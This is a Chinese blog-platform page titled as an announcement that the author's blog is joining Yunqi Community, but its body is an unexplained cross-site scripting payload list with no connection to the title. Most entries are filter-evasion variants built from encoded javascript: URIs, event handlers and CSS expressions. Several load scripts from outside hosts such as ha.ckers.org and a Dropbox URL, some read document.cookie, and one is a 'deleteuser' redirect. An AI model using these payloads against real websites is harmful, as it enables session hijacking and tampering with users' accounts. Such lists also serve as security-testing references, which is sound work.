out < a...">
美文网首页
我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。

我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。

作者: 二狗二狗 | 来源:发表于2018-12-21 10:50 被阅读0次

    我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。

    <IMG SRC= onmouseover="alert('xxs')">

    <IMG onmouseover="alert('xxs')">

    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

    <IMG SRC="jav ascript:alert('XSS');">

    <IMG SRC="jav&#x09;ascript:alert('XSS');">

    <IMG SRC="jav&#x0A;ascript:alert('XSS');">

    <IMG SRC="jav&#x0D;ascript:alert('XSS');">

    perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

    <IMG SRC=" &#14;  javascript:alert('XSS');">

    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <<SCRIPT>alert("XSS");//<</SCRIPT>

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

    <SCRIPT SRC=//ha.ckers.org/.j>

    <IMG SRC="javascript:alert('XSS')"

    <iframe src=http://ha.ckers.org/scriptlet.html <

    \";alert('XSS');//

    </TITLE><SCRIPT>alert("XSS");</SCRIPT>

    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

    <BODY BACKGROUND="javascript:alert('XSS')">

    <IMG DYNSRC="javascript:alert('XSS')">

    <IMG LOWSRC="javascript:alert('XSS')">

    <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

    <IMG SRC='vbscript:msgbox("XSS")'>

    <IMG SRC="livescript:[code]">

    <BODY ONLOAD=alert('XSS')>

    <BGSOUND SRC="javascript:alert('XSS');">

    <BR SIZE="&{alert('XSS')}">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

    <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

    <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

    exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    <XSS STYLE="xss:expression(alert('XSS'))">

    <XSS STYLE="behavior: url(xss.htc);">

    ¼script¾alert(¢XSS¢)¼/script¾

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

    <TABLE BACKGROUND="javascript:alert('XSS')">

    <TABLE><TD BACKGROUND="javascript:alert('XSS')">

    <DIV STYLE="background-image: url(javascript:alert('XSS'))">

    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

    <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

    <DIV STYLE="width: expression(alert('XSS'));">

    <BASE HREF="javascript:alert('XSS');//">

    <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

    <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

    <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

    <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

    <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

    Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

    <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <A HREF="http://66.102.7.147/">XSS</A>

    <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

    <A HREF="http://1113982867/">XSS</A>

    <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

    <A HREF="http://0102.0146.0007.00000223/">XSS</A>

    <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>

    <iframe  src="&Tab;javascript:prompt(1)&Tab;">

    <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

    <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

    <sVg><scRipt >alert&lpar;1&rpar; {Opera}

    <img/src=`` onerror=this.onerror=confirm(1)

    <form><isindex formaction="javascript&colon;confirm(1)"

    <img src=``&NewLine; onerror=alert(1)&NewLine;

    <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

    <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

    <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

    <script /**/>/**/alert(1)/**/</script /**/

    &#34;&#62;<h1/onmouseover='\u0061lert(1)'>

    <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

    <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

    <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

    <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

    <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

    <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

    <form><a href="javascript:\u0061lert&#x28;1&#x29;">X

    </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>

    <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

    <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

    <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

    http://www.google<script .com>alert(document.location)</script

    <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

    <img/src=@&#32;&#13; onerror = prompt('&#49;')

    <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

    <script ^__^>alert(String.fromCharCode(49))</script ^__^

    </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

    &#00;</form><input type&#61;"date" onfocus="alert(1)">

    <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

    <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

    <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

    <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

    <script ~~~>alert(0%0)</script ~~~>

    <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

    <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

    <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

    &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

    &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

    <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

    <div/style="width:expression(confirm(1))">X</div> {IE7}

    <iframe// src=javaSCRIPT&colon;alert(1)

    //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

    /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

    //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

    </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

    <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

    </plaintext\></|\><plaintext/onmouseover=prompt(1)

    </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

    <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

    <div onmouseover='alert&lpar;1&rpar;'>DIV</div>

    <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

    <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

    <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

    <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

    <var onmouseover="prompt(1)">On Mouse Over</var>

    <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

    <img src="/" =_=" title="onerror='prompt(1)'">

    <%<!--'%><script>alert(1);</script -->

    <script src="data:text/javascript,alert(1)"></script>

    <iframe/src \/\/onload = prompt(1)

    <iframe/onreadystatechange=alert(1)

    <svg/onload=alert(1)

    <input value=<><iframe/src=javascript:confirm(1)

    <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

    <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

    <img src=`xx:xx`onerror=alert(1)>

    <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

    <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

    <math><a xlink:href="//jsfiddle.net/t846h/">click

    <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

    <svg contentScriptType=text/vbs><script>MsgBox+1

    <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

    <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

    <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

    <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

    <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

    <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

    <script>+-+-1-+-+alert(1)</script>

    <body/onload=&lt;!--&gt;&#10alert(1)>

    <script itworksinallbrowsers>/*<script* */alert(1)</script

    <img src ?itworksonchrome?\/onerror = alert(1)

    <svg><script>//&NewLine;confirm(1);</script </svg>

    <svg><script onlypossibleinopera:-)> alert(1)

    <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

    <script x> alert(1) </script 1=2

    <div/onmouseover='alert(1)'> style="x:">

    <--`<img/src=` onerror=alert(1)> --!>

    <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

    <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

    "><img src=x onerror=window.open('https://www.google.com/');>

    <form><button formaction=javascript&colon;alert(1)>CLICKME

    <math><a xlink:href="//jsfiddle.net/t846h/">click

    <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

    <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

    <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    '';!--"<XSS>=&{()}

    '>//\\,<'>">">"*"

    '); alert('XSS

    <script>alert(1);</script>

    <script>alert('XSS');</script>

    <IMG SRC="javascript:alert('XSS');">

    <IMG SRC=javascript:alert('XSS')>

    <IMG SRC=javascript:alert('XSS')>

    <IMG SRC=javascript:alert(&quot;XSS&quot;)>

    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

    <scr<script>ipt>alert('XSS');</scr</script>ipt>

    <script>alert(String.fromCharCode(88,83,83))</script>

    <img src=foo.png onerror=alert(/xssed/) />

    <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

    <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

    <marquee><script>alert('XSS')</script></marquee>

    <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

    <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">

    <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">

    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

    "><script>alert(0)</script>

    <script src=http://yoursite.com/your_files.js></script>

    </title><script>alert(/xss/)</script>

    </textarea><script>alert(/xss/)</script>

    <IMG LOWSRC=\"javascript:alert('XSS')\">

    <IMG DYNSRC=\"javascript:alert('XSS')\">

    <font style='color:expression(alert(document.cookie))'>

    <img src="javascript:alert('XSS')">

    <script language="JavaScript">alert('XSS')</script>

    <body onunload="javascript:alert('XSS');">

    <body onLoad="alert('XSS');"

    [color=red' onmouseover="alert('xss')"]mouse over[/color]

    "/></a></><img src=1.gif onerror=alert(1)>

    window.alert("Bonjour !");

    <div style="x:expression((window.r==1)?'':eval('r=1;

    alert(String.fromCharCode(88,83,83));'))">

    <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

    "><script alert(String.fromCharCode(88,83,83))</script>

    '>><marquee><h1>XSS</h1></marquee>

    '">><script>alert('XSS')</script>

    '">><marquee><h1>XSS</h1></marquee>

    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

    <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">

    <script>var var = 1; alert(var)</script>

    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    <?='<SCRIPT>alert("XSS")</SCRIPT>'?>

    <IMG SRC='vbscript:msgbox(\"XSS\")'>

    " onfocus=alert(document.domain) "> <"

    <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

    <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

    perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

    perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

    <br size=\"&{alert('XSS')}\">

    <scrscriptipt>alert(1)</scrscriptipt>

    </br style=a:expression(alert())>

    </script><script>alert(1)</script>

    "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    [color=red width=expression(alert(123))][color]

    <BASE HREF="javascript:alert('XSS');//">

    Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

    "></iframe><script>alert(123)</script>

    <body onLoad="while(true) alert('XSS');">

    '"></title><script>alert(1111)</script>

    </textarea>'"><script>alert(document.cookie)</script>

    '""><script language="JavaScript"> alert('X \nS \nS');</script>

    </script></script><<<<script><>>>><<<script>alert(123)</script>

    <html><noalert><noscript>(123)</noscript><script>(123)</script>

    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

    '></select><script>alert(123)</script>

    '>"><script src = 'http://www.site.com/XSS.js'></script>

    }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

    <SCRIPT>document.write("XSS");</SCRIPT>

    a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

    ='><script>alert("xss")</script>

    <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>

    <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

    ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

    ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

    src="http://www.site.com/XSS.js"></script>

    data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

    !--" /><script>alert('xss');</script>

    <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

    "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

    '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

    <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

    <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>

    "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

    '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

    <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>

    '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='

    "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="

    \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'

    http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??

    http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??

    '); alert('xss'); var x='

    \\'); alert(\'xss\');var x=\'

    //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

    >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

    <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>

    </body>

    </html>

    <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

    <SCRIPT> alert(“XSS”); </SCRIPT>

    <BODY ONLOAD=alert("XSS")>

    <BODY BACKGROUND="javascript:alert('XSS')">

    相关文章

      网友评论

          本文标题:我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。

          本文链接:https://www.haomeiwen.com/subject/rwqmkqtx.html